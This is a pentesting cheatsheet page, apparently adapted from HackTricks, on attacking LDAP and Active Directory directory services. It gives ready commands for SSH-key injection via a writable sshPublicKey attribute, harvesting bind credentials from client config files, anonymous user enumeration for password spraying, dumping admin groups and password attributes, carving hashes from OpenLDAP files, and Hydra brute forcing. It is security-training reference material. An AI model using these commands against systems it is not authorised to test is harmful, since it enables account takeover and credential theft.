daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pentesting-ldap.md (22365B)


      1 ---
      2 title: "389, 636, 3268, 3269 - Pentesting LDAP"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-ldap.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-ldap.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 389, 636, 3268, 3269 - Pentesting LDAP
     14 
     15 **LDAP** (Lightweight Directory Access Protocol) provides access to directory services: clients can search, read, add, modify, and delete directory entries when access controls permit it. Common deployments store identities, groups, devices, and service configuration. LDAP was designed as a lighter-weight way to access directory models derived from X.500.<sup>[[6]](#references)[[7]](#references)</sup>
     16 
     17 An LDAP server is also called a Directory System Agent (DSA). A directory can be partitioned into naming contexts and distributed or replicated across DSAs, but not every server necessarily contains a synchronized copy of the entire tree. A DSA may return referrals when another server holds the requested data.<sup>[[6]](#references)[[7]](#references)</sup>
     18 
     19 Entries form a **Directory Information Tree (DIT)** and are identified by Distinguished Names (DNs). A deployment may use DNS-style domain components (`dc=example,dc=com`), country/organization components, organizational units, or another schema-appropriate hierarchy; there is no requirement that every tree follow a country → organization pattern.<sup>[[6]](#references)</sup>
     20 
     21 **Common ports:** TCP 389 for LDAP (optionally upgraded with StartTLS) and TCP 636 for LDAP over TLS (`ldaps`). On an Active Directory domain controller that is also a Global Catalog server, TCP 3268 provides Global Catalog LDAP and TCP 3269 provides Global Catalog LDAP over TLS.<sup>[[8]](#references)</sup>
     22 
     23 ```text
     24 PORT    STATE SERVICE REASON
     25 389/tcp open  ldap    syn-ack
     26 636/tcp open  tcpwrapped
     27 ```
     28 
     29 ### LDAP Data Interchange Format
     30 
     31 LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename).
     32 
     33 ```bash
     34 dn: dc=local
     35 dc: local
     36 objectClass: dcObject
     37 
     38 dn: dc=moneycorp,dc=local
     39 dc: moneycorp
     40 objectClass: dcObject
     41 objectClass: organization
     42 
     43 dn: ou=it,dc=moneycorp,dc=local
     44 objectClass: organizationalUnit
     45 ou: it
     46 
     47 dn: ou=marketing,dc=moneycorp,dc=local
     48 objectClass: organizationalUnit
     49 ou: marketing
     50 
     51 dn: uid=pepe,ou=it,dc=moneycorp,dc=local
     52 objectClass: inetOrgPerson
     53 cn: Pepe Example
     54 sn: Example
     55 givenName: Pepe
     56 uid: pepe
     57 mail: pepe@hacktricks.xyz
     58 telephoneNumber: 23627387495
     59 ```
     60 
     61 - Lines 1-3 define the top level domain local
     62 - Lines 5-8 define the first level domain moneycorp (moneycorp.local)
     63 - Lines 10-16 define two organizational units: `it` and `marketing`.
     64 - The final record creates a person entry and assigns schema-valid attributes.
     65 
     66 ## Write data
     67 
     68 Writable attributes can have security impact beyond the directory itself. For example, if a host is explicitly configured to retrieve SSH authorized keys from LDAP and you can replace a target's `sshPublicKey` attribute, you may be able to authenticate as that user without their password. Confirm the SSH integration and attribute mapping; the mere presence of the attribute does not prove that any host consumes it.<sup>[[1]](#references)</sup>
     69 
     70 ```bash
     71 # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
     72 >>> import ldap3
     73 >>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
     74 >>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
     75 >>> connection.bind()
     76 True
     77 >>> connection.extend.standard.who_am_i()
     78 u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
     79 >>> connection.modify('uid=USER,ou=USERS,dc=DOMAIN,dc=TLD', {'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
     80 ```
     81 
     82 ## Linux client-side LDAP artifacts
     83 
     84 On Linux hosts integrated with LDAP/AD, valuable secrets often live in the **client configuration**, not only on the LDAP server itself.
     85 
     86 Common files:
     87 
     88 ```bash
     89 ls -l /etc/sssd/sssd.conf /etc/nslcd.conf /etc/ldap/ldap.conf /etc/krb5.conf 2>/dev/null
     90 sed -n '1,120p' /etc/sssd/sssd.conf 2>/dev/null
     91 sed -n '1,120p' /etc/nslcd.conf 2>/dev/null
     92 ```
     93 
     94 High-value keys:
     95 
     96 - **`ldap_uri`** and **`ldap_search_base`**: where and what to query
     97 - **`ldap_default_bind_dn`** and **`ldap_default_authtok`**: reusable bind credentials
     98 - **`id_provider`** / **`auth_provider`**: tells you whether SSSD is using LDAP, Kerberos, or both
     99 
    100 Useful follow-up:
    101 
    102 ```bash
    103 grep -nE '^(ldap_uri|ldap_search_base|ldap_default_bind_dn|ldap_default_authtok|id_provider|auth_provider)\\s*=' \
    104   /etc/sssd/sssd.conf /etc/nslcd.conf 2>/dev/null
    105 
    106 ldapsearch -x -H ldap://<target> -D "<bind-dn>" -w '<password>' -b "<base-dn>"
    107 ```
    108 
    109 What to look for:
    110 
    111 - **world-readable `sssd.conf` / `nslcd.conf`**
    112 - cleartext bind credentials
    113 - directory-backed SSH or sudo integrations that turn a readable config into real authz impact
    114 
    115 ## Cleartext credentials and TLS downgrade risks
    116 
    117 An LDAP **simple bind** over an unprotected connection exposes the bind DN and password to an on-path observer. Not every authentication mechanism is plaintext: SASL mechanisms may provide their own integrity/confidentiality, and StartTLS or `ldaps://` can protect the session.<sup>[[9]](#references)</sup>
    118 
    119 An on-path attacker may be able to suppress or interfere with StartTLS when a client treats TLS as optional and falls back to an unprotected simple bind. A correctly configured client must require TLS before sending credentials and fail closed if negotiation fails.
    120 
    121 For `ldaps://` or successfully negotiated StartTLS, interception additionally requires the client to accept an untrusted or name-mismatched certificate, or compromise of a trusted CA/key. LDAP clients are often unattended services, so certificate validation policy—not an interactive user prompt—is the relevant control.<sup>[[10]](#references)</sup>
    122 
    123 ## Anonymous Access
    124 
    125 ### Bypass TLS SNI check
    126 
    127 In the cited environment, resolving an attacker-chosen hostname to the LDAP service changed how the TLS connection was accepted and made an anonymously readable directory reachable. Treat this as a deployment-specific hostname/SNI and certificate-routing check, not a generic LDAP authentication bypass:<sup>[[2]](#references)</sup>
    128 
    129 ```bash
    130 ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
    131 ```
    132 
    133 ### LDAP anonymous binds
    134 
    135 An LDAP anonymous bind establishes an unauthenticated authorization state. Active Directory allows limited RootDSE discovery anonymously but, since Windows Server 2003 defaults, generally requires authentication to search directory data. Administrators can deliberately grant broader anonymous access for legacy applications; a mistaken ACL can then expose users, groups, computers, attributes, or policy data.<sup>[[3]](#references)</sup>
    136 
    137 ### Anonymous LDAP enumeration with NetExec (null bind)
    138 
    139 If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds.<sup>[[4]](#references)[[5]](#references)</sup> Useful filters:
    140 - (objectClass=*) to inventory objects under a base DN
    141 - (sAMAccountName=*) to harvest user principals
    142 
    143 Examples:
    144 
    145 ```bash
    146 # Enumerate objects from the root DSE (base DN autodetected)
    147 netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
    148 
    149 # Dump users with key attributes for spraying and targeting
    150 netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
    151 
    152 # Extract just the sAMAccountName field into a list
    153 netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
    154   | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt
    155 ```
    156 
    157 What to look for:
    158 - sAMAccountName, userPrincipalName
    159 - memberOf and OU placement to scope targeted sprays
    160 - pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.)
    161 
    162 Note: When the requested anonymous search is not permitted, an Operations error indicating that a bind is required is common. Other errors can reflect the base DN, filter, signing/channel-binding policy, or server-specific access controls.
    163 
    164 ## Valid Credentials
    165 
    166 If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
    167 
    168 [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
    169 
    170 ```bash
    171 pip3 install ldapdomaindump
    172 ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
    173 ```
    174 
    175 ### [Brute Force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#ldap)
    176 
    177 ## Enumeration
    178 
    179 ### Automated
    180 
    181 These scripts may reveal anonymously accessible metadata such as naming contexts and supported controls:
    182 
    183 ```bash
    184 nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
    185 ```
    186 
    187 ### Python
    188 
    189 <details>
    190 
    191 <summary>See LDAP enumeration with python</summary>
    192 
    193 You can enumerate an LDAP directory with or without credentials using Python: `pip3 install ldap3`.
    194 
    195 First try to **connect without** credentials:
    196 
    197 ```bash
    198 >>> import ldap3
    199 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
    200 >>> connection = ldap3.Connection(server)
    201 >>> connection.bind()
    202 True
    203 >>> server.info
    204 ```
    205 
    206 If the bind returns `True`, inspect RootDSE metadata such as naming contexts and supported features. A successful anonymous bind does not imply that subtree searches are authorized.
    207 
    208 ```bash
    209 >>> server.info
    210 DSA info (from DSE):
    211 Supported LDAP versions: 3
    212 Naming contexts:
    213 dc=DOMAIN,dc=DOMAIN
    214 ```
    215 
    216 Once you have a naming context, this subtree query requests all objects the bound identity is allowed to read:
    217 
    218 ```bash
    219 >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
    220 True
    221 >> connection.entries
    222 ```
    223 
    224 Or **dump** the whole ldap:
    225 
    226 ```bash
    227 >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
    228 True
    229 >>> connection.entries
    230 ```
    231 
    232 </details>
    233 
    234 ### windapsearch
    235 
    236 [**Windapsearch**](https://github.com/ropnop/windapsearch) is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries.
    237 
    238 ```bash
    239 # Get computers
    240 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
    241 # Get groups
    242 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
    243 # Get users
    244 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --users
    245 # Get Domain Admins
    246 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
    247 # Get Privileged Users
    248 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
    249 ```
    250 
    251 ### ldapsearch
    252 
    253 Check null credentials or if your credentials are valid:
    254 
    255 ```bash
    256 ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
    257 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
    258 ```
    259 
    260 ```bash
    261 # CREDENTIALS NOT VALID RESPONSE
    262 search: 2
    263 result: 1 Operations error
    264 text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
    265  tion a successful bind must be completed on the connection., data 0, v3839
    266 ```
    267 
    268 An error saying that a successful bind must be completed means the requested operation is not permitted in the current authentication state. Possible causes include invalid credentials, an anonymous/omitted bind, or a server policy requiring signing, channel binding, or a different authentication mechanism.
    269 
    270 You can extract **everything from a domain** using:
    271 
    272 ```bash
    273 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
    274 -x Simple Authentication
    275 -H LDAP Server
    276 -D My User
    277 -w My password
    278 -b Base site, all data from here will be given
    279 ```
    280 
    281 Extract **users**:
    282 
    283 ```bash
    284 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
    285 #Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
    286 ```
    287 
    288 Extract **computers**:
    289 
    290 ```bash
    291 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
    292 ```
    293 
    294 Extract **my info**:
    295 
    296 ```bash
    297 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
    298 ```
    299 
    300 Extract **Domain Admins**:
    301 
    302 ```bash
    303 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
    304 ```
    305 
    306 Extract **Domain Users**:
    307 
    308 ```bash
    309 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
    310 ```
    311 
    312 Extract **Enterprise Admins**:
    313 
    314 ```bash
    315 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
    316 ```
    317 
    318 Extract **Administrators**:
    319 
    320 ```bash
    321 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
    322 ```
    323 
    324 Extract **Remote Desktop Group**:
    325 
    326 ```bash
    327 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
    328 ```
    329 
    330 To see if you have access to any password you can use grep after executing one of the queries:
    331 
    332 ```bash
    333 <ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
    334 ```
    335 
    336 Values in password-like attributes may be hashes, application-specific secrets, stale data, or decoys rather than current plaintext passwords.
    337 
    338 #### pbis
    339 
    340 You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.\
    341 **PBIS Open** is now an archived project, but it may still be installed on older LDAP/AD-integrated hosts. Its utilities can expose useful local integration information:
    342 
    343 ```bash
    344 #Read keytab file
    345 ./klist -k /etc/krb5.keytab
    346 
    347 #Get known domains info
    348 ./get-status
    349 ./lsa get-status
    350 
    351 #Get basic metrics
    352 ./get-metrics
    353 ./lsa get-metrics
    354 
    355 #Get users
    356 ./enum-users
    357 ./lsa enum-users
    358 
    359 #Get groups
    360 ./enum-groups
    361 ./lsa enum-groups
    362 
    363 #Get all kind of objects
    364 ./enum-objects
    365 ./lsa enum-objects
    366 
    367 #Get groups of a user
    368 ./list-groups-for-user <username>
    369 ./lsa list-groups-for-user <username>
    370 #Get groups of each user
    371 ./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
    372 
    373 #Get users of a group
    374 ./enum-members --by-name "domain admins"
    375 ./lsa enum-members --by-name "domain admins"
    376 #Get users of each group
    377 ./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
    378 
    379 #Get description of each user
    380 ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
    381     echo "$line";
    382     ./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
    383     echo "======================"
    384 done
    385 ```
    386 
    387 ## Graphical Interface
    388 
    389 ### Apache Directory
    390 
    391 [**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s).
    392 
    393 ### jxplorer
    394 
    395 You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
    396 
    397 By default it may be installed in `/opt/jxplorer`.
    398 
    399 ![Apache Directory - jxplorer: By default is is installed in: /opt/jxplorer](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28482%29.png)
    400 
    401 ### Godap
    402 
    403 Godap is an interactive terminal user interface for LDAP that can be used to interact with objects and attributes in AD and other LDAP servers. It is available for Windows, Linux and MacOS and supports simple binds, pass-the-hash, pass-the-ticket & pass-the-cert, along with several other specialized features such as searching/creating/changing/deleting objects, adding/removing users from groups, changing passwords, editing object permissions (DACLs), modifying Active-Directory Integrated DNS (ADIDNS), exporting to JSON files, etc.
    404 
    405 ![Godap LDAP client interface](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/godap.png)
    406 
    407 You can access it in [https://github.com/Macmod/godap](https://github.com/Macmod/godap). For usage examples and instructions read the [Wiki](https://github.com/Macmod/godap/wiki).
    408 
    409 ### Ldapx
    410 
    411 Ldapx is a flexible LDAP proxy that can be used to inspect & transform LDAP traffic from other tools. It can be used to obfuscate LDAP traffic to attempt to bypass identity protection & LDAP monitoring tools and implements most of the methods presented in the [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo) talk.
    412 
    413 ![LDAPX client interface](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/ldapx.png)
    414 
    415 You can get it from [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
    416 
    417 ## Authentication via Kerberos
    418 
    419 With a valid Kerberos credential cache and correct service principal/DNS setup, `ldapsearch -Y GSSAPI` uses SASL GSSAPI rather than a simple bind. Whether another invocation uses NTLM depends on the LDAP library and SASL mechanism; `ldapsearch -x` specifically requests simple authentication.
    420 
    421 ## Post-exploitation
    422 
    423 Legacy OpenLDAP deployments may store Berkeley DB files under `/var/lib/ldap`. If the exact backend uses readable `.bdb` files, this historical string-carving approach may recover password-hash records, but modern `mdb` backends and binary database formats require backend-aware offline tooling or a consistent backup:
    424 
    425 ```bash
    426 cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
    427 ```
    428 
    429 Extract only the hash value (for example, the string beginning with `{SSHA}`) and select the matching John the Ripper/Hashcat format. Do not append adjacent LDIF or database fields such as `structuralObjectClass`.
    430 
    431 ### Configuration Files
    432 
    433 - General
    434   - containers.ldif
    435   - ldap.cfg
    436   - ldap.conf
    437   - ldap.xml
    438   - ldap-config.xml
    439   - ldap-realm.xml
    440   - slapd.conf
    441 - IBM SecureWay V3 server
    442   - V3.sas.oc
    443 - Microsoft Active Directory server
    444   - msadClassesAttrs.ldif
    445 - Netscape Directory Server 4
    446   - nsslapd.sas_at.conf
    447   - nsslapd.sas_oc.conf
    448 - OpenLDAP directory server
    449   - slapd.sas_at.conf
    450   - slapd.sas_oc.conf
    451 - Sun ONE Directory Server 5.1
    452   - 75sas.ldif
    453 
    454 ## HackTricks Automatic Commands
    455 
    456 ```text
    457 Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
    458 Port_Number:  389,636     #Comma separated if there is more than one.
    459 Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out
    460 
    461 Entry_1:
    462   Name: Notes
    463   Description: Notes for LDAP
    464   Note: |
    465     The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
    466 
    467     https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html
    468 
    469 Entry_2:
    470   Name: Banner Grab
    471   Description: Grab LDAP Banner
    472   Command: nmap -p 389 --script ldap-search -Pn {IP}
    473 
    474 Entry_3:
    475   Name: LdapSearch
    476   Description: Base LdapSearch
    477   Command: ldapsearch -H ldap://{IP} -x
    478 
    479 Entry_4:
    480   Name: LdapSearch Naming Context Dump
    481   Description: Attempt to get LDAP Naming Context
    482   Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
    483 
    484 Entry_5:
    485   Name: LdapSearch Big Dump
    486   Description: Need Naming Context to do big dump
    487   Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
    488 
    489 Entry_6:
    490   Name: Hydra Brute Force
    491   Description: Need User
    492   Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
    493 
    494 Entry_7:
    495     Name: Netexec LDAP BloodHound
    496     Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp
    497 ```
    498 
    499 ## References
    500 
    501 - [1] [Exploiting LDAP Server NULL Bind](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
    502 - [2] [Exploiting Arbitrary Object Instantiations in PHP without Custom Classes](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
    503 - [3] [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
    504 - [4] [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
    505 - [5] [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
    506 - [6] [RFC 4512 – LDAP Directory Information Models](https://www.rfc-editor.org/rfc/rfc4512)
    507 - [7] [RFC 4511 – LDAP protocol operations](https://www.rfc-editor.org/rfc/rfc4511)
    508 - [8] [Microsoft Active Directory LDAP and Global Catalog ports](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1010e59a-cf64-410c-a05c-a3a6c715261a)
    509 - [9] [RFC 4513 – LDAP authentication methods and security mechanisms](https://www.rfc-editor.org/rfc/rfc4513)
    510 - [10] [OpenLDAP 2.6 Administrator's Guide – Using TLS](https://openldap.org/doc/admin26/tls.html)